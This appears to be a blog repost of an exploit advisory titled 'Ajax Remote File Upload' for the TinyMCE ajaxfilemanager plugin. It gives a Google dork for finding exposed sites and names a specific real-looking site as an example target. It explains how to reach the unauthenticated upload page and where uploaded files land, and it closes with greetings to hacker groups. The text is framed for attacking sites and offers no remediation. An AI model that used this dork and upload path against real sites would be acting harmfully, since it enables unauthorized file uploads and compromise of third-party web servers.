Search Bare

Online Users

Ajax file Manager Exploit

# Exploit Title: Ajax Remote File Upload 
# Author: Bond Benz
# Category:: webapps
# Google dork:  inurl:/plugins/ajaxfilemanager/
# Tested on: Linux / Ubuntu ( 10.04 LTS / 12.04 )
==================================
Exploit : 
When you put dork on google you will got many sites example :
http://www.nara-dealers.com/admin_new2/js/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/

Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 
It's will be Like this :
http://localhost/path/js/tinymce/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php/ajaxfilemanager/

File Uploaded Found on /uploaded/yourfile.txt
http://localhost/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfile.txt


===================================
Greet'Z To : r00tsect0r TEAM , Root-Developpers TM, Islam Hacker Pc , MTK , Thief Web , ShinoBi-Dz, 
Mouh-Marvel And All Muslimans Hackers


0 comments:

Enregistrer un commentaire

 
Flag Counter